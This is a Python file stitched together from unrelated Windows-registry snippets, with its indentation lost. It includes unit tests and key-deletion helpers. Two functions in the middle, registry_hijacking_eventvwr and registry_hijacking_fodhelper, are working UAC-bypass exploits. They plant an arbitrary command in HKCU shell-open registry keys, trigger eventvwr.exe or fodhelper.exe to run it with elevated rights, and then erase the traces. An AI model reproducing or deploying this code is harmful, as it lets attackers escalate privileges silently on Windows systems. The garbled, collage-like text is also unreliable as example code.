def test_long_key(self):
from _winreg import (HKEY_CURRENT_USER, KEY_ALL_ACCESS, CreateKey,
SetValue, EnumKey, REG_SZ, QueryInfoKey, OpenKey,
DeleteKey)
name = 'x' * 256
try:
with CreateKey(HKEY_CURRENT_USER, self.test_key_name) as key:
SetValue(key, name, REG_SZ, 'x')
num_subkeys, num_values, t = QueryInfoKey(key)
EnumKey(key, 0)
finally:
with OpenKey(HKEY_CURRENT_USER, self.test_key_name, 0,
KEY_ALL_ACCESS) as key:
DeleteKey(key, name)
DeleteKey(HKEY_CURRENT_USER, self.test_key_name)
def registry_hijacking_eventvwr(cmd, params=""):
# '''
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
# '''
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
mscCmdPath = r'Software\Classes\mscfile\shell\open\command'
if params:
cmd = '%s %s'.strip() % (cmd, params)
try:
# The registry key already exist in HKCU, altering...
registry_key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
except:
# Adding the registry key in HKCU
registry_key = CreateKey(HKCU, mscCmdPath)
SetValueEx(registry_key, '', 0, REG_SZ, cmd)
CloseKey(registry_key)
# Executing eventvwr.exe
eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True)
# Sleeping 5 secds...
time.sleep(5)
#Clean everything
DeleteKey(HKCU, mscCmdPath)
def registry_hijacking_fodhelper(cmd, params=""):
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
fodhelperPath = r'Software\Classes\ms-settings\Shell\Open\command'
if params:
cmd = '%s %s'.strip() % (cmd, params)
try:
# The registry key already exist in HKCU, altering...
OpenKey(HKCU, fodhelperPath, KEY_SET_VALUE)
except:
# Adding the registry key in HKCU
CreateKey(HKCU, fodhelperPath)
registry_key = OpenKey(HKCU, fodhelperPath, 0, KEY_WRITE)
SetValueEx(registry_key, 'DelegateExecute', 0, REG_SZ, "")
SetValueEx(registry_key, '', 0, REG_SZ, cmd)
CloseKey(registry_key)
# Creation fodhelper.exe path
triggerPath = os.path.join(os.environ['WINDIR'],'System32','fodhelper.exe')
# Disables file system redirection for the calling thread (File system redirection is enabled by default)
wow64 = ctypes.c_long(0)
ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(ctypes.byref(wow64))
# Executing fodhelper.exe
subprocess.check_output(triggerPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True)
# Enable file system redirection for the calling thread
ctypes.windll.kernel32.Wow64EnableWow64FsRedirection(wow64)
# Sleeping 5 secds...
time.sleep(5)
# Clean everything
DeleteKey(HKCU, fodhelperPath)
def test_delete(self):
from _winreg import OpenKey, KEY_ALL_ACCESS, DeleteValue, DeleteKey
key = OpenKey(self.root_key, self.test_key_name, 0, KEY_ALL_ACCESS)
sub_key = OpenKey(key, "sub_key", 0, KEY_ALL_ACCESS)
for name, value, type in self.test_data:
DeleteValue(sub_key, name)
DeleteKey(key, "sub_key")
def reg_del(name, key=HKEY_CURRENT_USER):
# Delete a registry key on Windows.
try:
reg = ConnectRegistry(None, key)
# registry_key = OpenKey(reg, name_base, 0, KEY_ALL_ACCESS)
DeleteKey(reg, name)
CloseKey(reg)
# Update the Windows behaviour.
# SendMessage(win32con.HWND_BROADCAST, win32con.WM_SETTINGCHANGE, 0, 'Environment')
return True
except ConnectRegistryError:
print('You should run this command as system administrator: run the terminal as administrator and type the command again.')
except WindowsError:
return False
def remove_all_registry_entries():
"""
Removes all related registry entries.
"""
main_key = None
try:
main_key = OpenKey(HKEY_CURRENT_USER, r'Software\Classes\*\shell',
0, KEY_ALL_ACCESS)
count = 0
while 1:
try:
key_name = EnumKey(main_key, count)
if key_name.find('DiWaCS') > -1:
key = OpenKey(main_key, key_name, 0, KEY_ALL_ACCESS)
subkey_count = 0
while 1:
try:
subkey_name = EnumKey(key, subkey_count)
DeleteKey(key, subkey_name)
subkey_count += 1
except WindowsError:
break
CloseKey(key)
try:
DeleteKey(main_key, key_name)
except WindowsError:
count += 1
else:
count += 1
except WindowsError:
break
except Exception as excp:
excp_string = 'Exception in remove_all_registry_entries: {0!s}'
_logger().exception(excp_string.format(excp))
if main_key:
CloseKey(main_key)
def delete_key(hkey, subkey, name):
result = None
registry_key = RegistryHelper.get_key(hkey, subkey, KEY_READ, False)
print registry_key
if registry_key:
try:
if PlatformHelper.is_64bit_machine():
result = win32api.RegDeleteKey(registry_key, name)
else:
result = DeleteKey(registry_key, name)
print result
except WindowsError as e:
print str(e)
LogHelper.error(str(e))
result = None
finally:
RegistryHelper.close_key(registry_key)
return result